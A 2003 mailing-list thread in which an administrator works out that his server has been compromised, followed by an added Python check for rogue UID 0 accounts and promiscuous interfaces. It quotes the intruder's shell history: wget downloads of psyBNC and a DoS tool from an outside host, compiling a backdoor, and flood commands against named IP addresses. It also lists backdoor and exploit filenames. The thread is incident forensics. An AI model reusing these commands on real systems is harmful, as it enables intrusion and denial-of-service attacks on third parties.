
Re: Strange segmentation faults and Zombies



Laurent Corbes {Caf'} wrote:
On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <markus.schabel@tgm.ac.at> wrote:


I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaulted.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.


curious.


In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
idea where they come from.


it's the daily cronjob that stole.

yes, and that's reproducible :(

You think the server got hacked? Are there any other things that can
lead to this? man also behaves strange, it says either "No manual entry
for...", "What manual page do you want?" or nothing.


I'm thinking about a hardware problem. Maybe the hard drive is failing (get the output of dmesg) or a very big
RAM problem that corrupts files on the hard drive.

request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.

but nothing about the disks

In every case simply copy all the data you can and inspect the HDD in
another box, mounting it read-only.

setuid.changes lists /dev/* and the following programs:
pppd
postdrop
postqueue
wall
newgrp
at
chage
chfn
chsh
expiry
gpasswd
passwd
write
crontab
dotlockfile
ssh-keysign
procmail
lockfile
popauth
pt_chown
traceroute
mount
umount
login
su
ping
suexec
/usr/lib/mc/bin/cons.saver

and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn there's a .bash_history with the following content:

id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569

and the executable dos

interesting is the line "tar --help" :D

in "last" I see the following:

slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)     200-147-107-35.tlm.dialuol.com.br

IP of the hacker is 200.147.107.35
I think we have no chance of legal action against .br?

in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)

so we got hacked :(

what information should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing, or do you have
any ideas?

thanks
Markus
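An added example, not written by anyone in this thread: a small check over constructed /etc/passwd and dmesg samples (the slacks entry and the promiscuous-mode lines are modelled on the ones quoted above) that flags the two indicators Markus found, an extra UID 0 account with a hidden home directory and an interface put into promiscuous mode.

```python
import re

# Constructed /etc/passwd sample; the "slacks" line is the one reported in the thread.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
markus:x:1000:1000:Markus:/home/markus:/bin/bash
slacks:x:0:0::/etc/.rpn:/bin/bash
"""

# Constructed dmesg excerpt modelled on the lines quoted in the thread.
DMESG_SAMPLE = """eth0: Link is up
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
"""


def passwd_findings(text):
    """Return (account, reason) pairs for suspicious passwd entries: a UID 0
    account under a name other than root, or a home directory that is a hidden
    directory outside /home (like /etc/.rpn)."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed passwd entry"))
            continue
        name, _, uid, _, _, home, _ = fields
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        if re.search(r"/\.[^/]+", home) and not home.startswith("/home/"):
            findings.append((name, f"hidden home directory {home}"))
    return findings


def promisc_interfaces(text):
    """Return the set of interfaces dmesg reports as entering promiscuous mode,
    a sniffer indicator when no capture tool is supposed to be running."""
    ifaces = set()
    for line in text.splitlines():
        m = re.match(r"(?:device )?(\w+)(?:: Promiscuous mode enabled\.| entered promiscuous mode)", line)
        if m:
            ifaces.add(m.group(1))
    return ifaces


if __name__ == "__main__":
    for who, why in passwd_findings(PASSWD_SAMPLE):
        print(f"passwd: {who}: {why}")
    for iface in sorted(promisc_interfaces(DMESG_SAMPLE)):
        print(f"dmesg: {iface} in promiscuous mode")
```

Run it against the real files copied off the disk mounted read-only, as suggested above, rather than on the compromised host itself.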


